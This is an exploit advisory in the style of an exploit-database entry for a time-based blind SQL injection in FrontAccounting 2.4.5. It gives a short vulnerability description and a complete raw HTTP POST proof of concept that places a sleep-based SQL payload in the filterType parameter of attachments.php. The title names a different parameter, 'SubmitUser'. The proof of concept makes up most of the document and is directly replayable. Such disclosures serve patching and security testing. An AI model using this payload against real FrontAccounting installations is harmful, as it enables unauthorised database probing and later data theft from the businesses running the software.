# Exploit Title: FrontAccounting 2.4.5 - 'SubmitUser' SQL Injection
# Google Dork: N/A
# Date: 2018-12-22
# Exploit Author: Sainadh Jamalpur
# Vendor Homepage: http://frontaccounting.com/
# Software Link: https://sourceforge.net/projects/frontaccounting/
# Version: 2.4.5
# Tested on: XAMPP version 3.2.2 in Windows 10 64bit, Kali linux X64
# CVE : N/A

# ========================= Vendor Summery =====================
#
# FrontAccounting (FA) is a professional web-based Accounting system for
# the entire ERP chain written in PHP, using MySQL. FA is multilingual and
# multicurrency.
#
# ======================== Vulnerability Description ===============
#
# the parameter "filterType" in /attachments.php is Vulnerable to Time
# Based Blind SQL Injection.
# 
# ======================== PoC =======================================

POST /frontaccounting/admin/attachments.php? HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0)
Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://localhost/frontaccounting/admin/attachments.php?
Content-Type: application/x-www-form-urlencoded
Content-Length: 367
DNT: 1
Connection: close
Cookie:
Upgrade-Insecure-Requests: 1
user_name_entry_field=admin&password=1234&company_login_name=0&ui_mode=1&SubmitUser=%A0%A0Login+--%3E%A0%A0&_random=831749.090143524&_token=1RJ9WhkRWKszXu-uPm6DTQxx&_confirmed=&_modified=0&_focus=filterType&ADD_ITEM=Add+new&description=&trans_no=&filterType=(select*from(select(sleep(20)))a)&_focus=filterType&_modified=0&_confirmed=&_token=Om-2mt32ZC3UkLAuzPwoFgxx